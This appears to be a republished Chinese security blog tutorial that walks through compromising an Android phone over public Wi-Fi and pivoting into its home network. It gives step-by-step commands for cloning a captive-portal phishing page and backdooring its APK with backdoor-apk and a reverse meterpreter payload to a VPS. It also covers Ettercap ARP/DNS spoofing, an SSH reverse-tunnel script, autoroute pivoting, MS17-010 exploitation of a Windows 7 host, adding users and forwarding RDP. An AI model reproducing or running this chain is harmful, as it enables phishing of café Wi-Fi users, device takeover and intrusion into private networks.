前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >MSF外网持久控制Android手机并渗透测试局域网

MSF外网持久控制Android手机并渗透测试局域网

作者头像
FB客服
发布2018-02-26 16:22:40
3.8K0
发布2018-02-26 16:22:40
举报
文章被收录于专栏:FreeBufFreeBuf

以前经常看Freebuf,学到了不少东西,现在想给入门的同学提供一点微小的帮助。以前老是不知道如何在外网使用msf这个神器,自己查了查资料,总结了一点自己的认识。

0. 环境:

a) Kali 2.0 (咖啡厅:192.168.0.2/校园网:172.16.X.X)

i. Metasploit-Framework ii. Ettercap(dns欺骗) iii. Backdoor-apk(apk后门) iv. Python -m SimpleHTTPServer 80 (轻量级HTTP服务器) v. SSH Tunnel (外网打洞)

b) Vultr vps 一台(Ubuntu 14.04)(公网IP:45.77.xx.xx)

echo GatewayPorts yes>>/etc/ssh/sshd_config

c) Android (魅蓝E2 Flyme by Yunos )( 咖啡厅:192.168.0.3/家庭局域网:192.168.0.3)

d) Win7 x64 sp1(ms17_010)(家庭局域网:192.168.0.5)

示意图:

1. 构造钓鱼页面

a) 首先我们在电脑上登录CMCC-EDU

b) 弹出一个页面

c) 该页面会提示下载一个 免费上网1.pak .我们正好用它来制作后门

d) 保存该页面到桌面, 将 免费上网.html 重命名为 index.html 并放到 免费上网_files 文件夹中,然后修改HTML:,

替换页面所有apk地址为免费上网.apk,并添加<iframe src=”免费上网.apk”>

e) python -m SimpleHTTPServer 80 #(在index.html所在文件夹直接启动HTTP服务)

2. 使用backdoor-apk制作apk后门

a) 现在我们

git clone https://github.com/dana-at-cp/backdoor-apk.git

b)

cd backdoor-apk-master/backdoor-apk

c) 将 免费上网1.apk 复制到此目录 并且重命名为 mfsw.apk

d)

./backdoor-apk.sh mfsw.apk

e) payload 选择 3

f) lhost 填写 vps 的IP地址 45.77.XX.XX

g) lport填写 99 (vultr 会封掉一部分端口,比如默认的4444)

h) 然后进入 original/dist 复制mfsw.apk 到 免费上网_files 那个包含我们钓鱼文件的文件夹,改名为 免费上网.apk

3. Ettercap 实现 DNS 欺骗

a) 查看ifconfig

b)

gedit /etc/ettercap/etter.dns

* A 192.168.0.2

* PTR 192.168.0.2

c) 开启ettercap-gui 选择wlan0

d) 扫描hosts

e) 选择欺骗 192.168.0.1 和 192.168.0.3 (Android)

f) 开启Arpspoof

g) 加载dns sproof 模块

h) 手机上如图:

i.

ii.

iii.

4. msf 通过SSHtunnel 接收 反弹meterpreter 会话

a) 下面我们切换kali连接到其他wifi,

ifconfig 查看一下当前kali ip

当前地址为 172.16.8.181 ,我们等下还是能接收到来自Android的会话

b)

vi sshTunnel

c)

#!/bin/bashif [ -n “$1” ]#判断参数$1是否为空then echo 0.0.0.0 $1”--<>--”45.77.xx.xx:$1ssh -C -g root@45.77.xx.xx -R $1:127.0.0.1:$1#这里是相同端口是因为,msf监听不到45.77.xx.xx:$1 会自动监听0.0.0.0:$1,刚好能正常接收会话elseecho 0.0.0.099”--<>--”45.77.xx.xx99 ssh -C -g root@45.77.xx.xx -R 99:127.0.0.1:99#默认监听99端口 fi

d) chmod +x sshTunnel

e) ./sshTunnel #默认99端口,运行sshtunnel 来实现 vps:99 到 127.0.0.1:99的转发

f) 其实这里已经有会话反弹过来了,只是本地msf监听没有开启

g) 现在我们开启msf监听

cd backdoor-apk/backdoor-apk/ msfconsole -r backdoor-apk. rc

h) 可以看到会话已经建立

i) session #查看

j) wakelock #保持唤醒防止掉线

k) session -i 1 #切换到meterpreter

l) 截个图录个音啥的都不是事,能中招的用户肯定会给权限的,毕竟不是所有人都是有安全意识

m) ifconfig#查看Android的网段

n) run autoroute -s 192.168.0.3 #添加自动路由background#返回msfconsole

o) 现在msf已经获得192.168.0.0/24网段的权限

但是我们还是有访问该网段的权限,扫描一手ms17_010

p) 既然是有ms17_010那就好办了(为了方便以后控制,加上bind_tcp正向连接成功率会低一点,所以使用reverse_tcp)

q) sshtunnel 打洞,45.77.xx.136:88->127.0.0.1:88

r) 可以看到,msf自动监听了0.0.0.0:88,这就是转发到相同端口的好处

s) 这里win7 x64会重启,然后获得会话,可以看到win7的会话也被vps转发回来了

t) seesion -i 2 #选择Windows的会话,并开启远程桌面

u) 输入shell,进行添加用户,这里也可以用 run getgui -e -u admin -p 123

v) 下面我们可以使用

protfwd add -l 1234 -r 192.168.0.5 -p 3389

将win7的远程桌面转发到本地1234端口

w) get it!

大三狗,会写Python,懂点Web安全,想去给网络安全公司的大佬端茶倒水(求一份网络安全实习,谢谢)

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2017-06-09,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 FreeBuf 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 1. 构造钓鱼页面
  • 2. 使用backdoor-apk制作apk后门
  • 3. Ettercap 实现 DNS 欺骗
  • 4. msf 通过SSHtunnel 接收 反弹meterpreter 会话
相关产品与服务
弹性公网 IP
弹性公网 IP(Elastic IP,EIP)是可以独立购买和持有,且在某个地域下固定不变的公网 IP 地址,可以与 CVM、NAT 网关、弹性网卡和高可用虚拟 IP 等云资源绑定,提供访问公网和被公网访问能力;还可与云资源的生命周期解耦合,单独进行操作;同时提供多种计费模式,您可以根据业务特点灵活选择,以降低公网成本。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档